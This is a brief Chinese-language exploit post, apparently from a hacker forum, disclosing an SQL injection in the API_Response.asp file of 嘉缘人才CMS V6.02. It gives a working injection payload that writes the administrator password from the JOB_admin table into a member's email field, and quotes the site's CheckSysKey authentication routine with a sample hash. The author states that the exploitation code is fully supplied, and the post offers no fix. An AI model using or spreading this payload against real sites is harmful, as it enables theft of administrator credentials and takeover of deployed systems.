漏洞作者：幻泉[B.S.N]
漏洞来源： http://www.hacker.com.cn
源码下载： 自己动手丰衣足食。
程序版本：嘉缘人才CMS系统V6.02(本人只测试了6.02，老版本大家自己测试吧。)
漏洞等级：高
漏洞说明：
/API/API_Response.asp

由于对ip没做过滤进行update操作导致出现注射漏洞。
如果access限制比较多。但是可以利用一下代码测试。

Code:
',Member_email=dFirst('JOB_pass','JOB_admin'),Member_url='aaa

这样就更新密码到email里了。

分析这个漏洞还需要对以下代码分析。

Code:
Function CheckSysKey(iName, iSysKey) ' username=huanquan   syskey
    If IsNull(iName) Or iName = "" Or IsNull(iSysKey) Or iSysKey = "" Then '如果都是空则结束调用
        CheckSysKey = False
        Exit Function
    End If
    If Len(iSysKey) = 32 Then '如果syskey长度是32则获取9-16位
        iSysKey = Mid(iSysKey, 9, 16)
    End If
    Dim strFRKey, strFRKeyNew
    strFRKey = Md5(iName&API_SysKey,16)   'baf588a6ba715854
    strFRKeyNew = Md5(iName&API_SysKey,16) 'baf588a6ba715854
    If LCase(iSysKey) = LCase(strFRKey) Or LCase(iSysKey) = LCase(strFRKeyNew) Then
        CheckSysKey = True
    Else
        CheckSysKey = False
    End If

我只介绍大概，漏洞利用代码都给了，大家可以自己看他的程序。